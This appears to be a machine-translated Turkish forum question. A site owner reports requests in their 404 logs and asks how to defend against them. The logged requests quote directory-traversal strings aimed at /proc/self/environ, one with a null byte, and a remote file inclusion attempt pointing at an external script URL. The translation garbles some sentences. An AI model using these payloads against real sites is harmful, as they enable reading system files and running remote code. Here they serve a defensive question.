404 günlüklerime baktığımda, her ikisi de bir kez meydana gelen şu iki URL'yi fark ettim:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
ve
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Söz konusu sayfa, library.phpbir gerektiriyor typesonra yarım düzine farklı kabul edilebilir değerlerle değişken ve bir iddeğişken. Dolayısıyla, geçerli bir URL
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
ve kimliklerin tümü mysql_real_escape_stringveritabanını sorgulamak için kullanılmadan önce çalıştırılır .
Ben bir çaylakım, ama bana göre bu bağlantıların her ikisi de webroot'a karşı basit saldırılar mı?
1) Bir 404 dışında bu tür şeylere karşı en iyi nasıl korunabilirim?
2) Sorumlu IP'lere izin vermeli miyim?
EDIT: bunu da fark ettim
/library.php=http://www.basfalt.no/scripts/danger.txt
DÜZENLEME 2: 3 saldırının tümü için rahatsız edici IP 216.97.231.15, Los Angeles'ın hemen dışında bulunan Lunar Pages adlı bir İSS'yi izlemiştir.
DÜZENLEME 3: Cuma sabahı yerel saat ISS'yi aramaya ve telefonda kimin bulabileceğine dair konuyu tartışmaya karar verdim. Sonuçları 24 saat içinde buraya göndereceğim.
EDIT 4: Ben onların yöneticilerini e-posta ile sona erdi ve ilk önce onlar "içine bakıyorduk" ve sonra bir gün sonra "Bu sorun şimdi çözülmelidir" ile cevap verdi. Ne yazık ki başka ayrıntı yok.
typeKullanımına dahil senaryoyu söyler (bir ile olsa IF $_GET['type'] == 'thing') {} ESLE..., değil gibi doğrudan bir bağlantı olarak include 'type.php') ve idmysql_real_escape_string üzerinden çalışmasını ve bu sorguları için kullanılır. Bunu bilerek hala güvende miyim?